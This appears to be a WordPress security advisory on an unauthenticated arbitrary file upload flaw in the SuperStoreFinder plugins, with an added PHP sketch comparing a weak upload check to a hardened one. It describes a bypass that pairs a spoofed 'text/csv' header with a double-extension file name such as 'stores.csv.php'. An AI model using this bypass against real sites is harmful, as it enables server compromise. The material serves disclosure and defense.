WordPress Plugin Vulnerabilities
SuperStoreFinder Plugins - Unauthenticated Arbitrary File Upload
Description
The SuperStoreFinder premium WordPress plugins did not properly validate file uploads: depending on the plugin, they checked only the MIME type and/or the first extension of the file name.
An attacker could send the header "Content-Type: text/csv" and use a double extension to bypass the checks in place, allowing arbitrary files to be uploaded.
The original advisory mentioned a Cross-Site Request Forgery (CSRF) vulnerability; however, there was no need to use a CSRF attack, as the request could be sent as an unauthenticated user.
According to the changelog, it appears that the plugin recently underwent a penetration test. It is possible that the patch from the penetration test was reverse engineered to create an exploit, which was then posted to the PacketStorm repository.
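The upload checks described above, sketched as an added example in PHP (not the plugin's code, which this page does not show): a validator that trusts the client-supplied Content-Type and the first extension, beside one that ignores the header, allow-lists the final extension and stores the file under a server-generated name. The function names, the `csv` allow-list and the sample file names are assumptions constructed for illustration.

```php
<?php
// Added example: hypothetical validators, not taken from the plugin.

const ALLOWED_EXT = ['csv']; // assumed allow-list for a store-import upload

// Weak check, as the advisory describes it: trusts the Content-Type sent
// by the client and looks only at the FIRST extension of the file name.
function weak_is_allowed(string $name, string $clientType): bool
{
    $parts = explode('.', $name);
    $firstExt = strtolower($parts[1] ?? '');
    return $clientType === 'text/csv' && $firstExt === 'csv';
}

// Hardened check: the client Content-Type is not consulted at all.
// The name must have exactly one extension, that extension must be on the
// allow-list, and the file is stored under a server-generated name.
// Returns the name to store the file under, or null if rejected.
function strict_store_name(string $name): ?string
{
    $base = basename(str_replace('\\', '/', $name)); // drop any path part
    $parts = explode('.', $base);
    if (count($parts) !== 2 || $parts[0] === '') {
        return null; // no extension, several extensions, or a dotfile
    }
    $ext = strtolower($parts[1]);
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample uploads: [file name, Content-Type header from client].
$samples = [
    ['stores.csv',     'text/csv'],
    ['stores.csv.php', 'text/csv'], // double extension, header set by client
    ['stores.php',     'text/csv'],
];

foreach ($samples as [$name, $type]) {
    $weak   = weak_is_allowed($name, $type) ? 'accepted' : 'rejected';
    $strict = strict_store_name($name) !== null ? 'accepted' : 'rejected';
    printf("%-16s weak=%-8s strict=%s\n", $name, $weak, $strict);
}
```

Because the request needed no authentication, a fix along these lines would also need a capability and nonce check on the upload handler before any file validation runs.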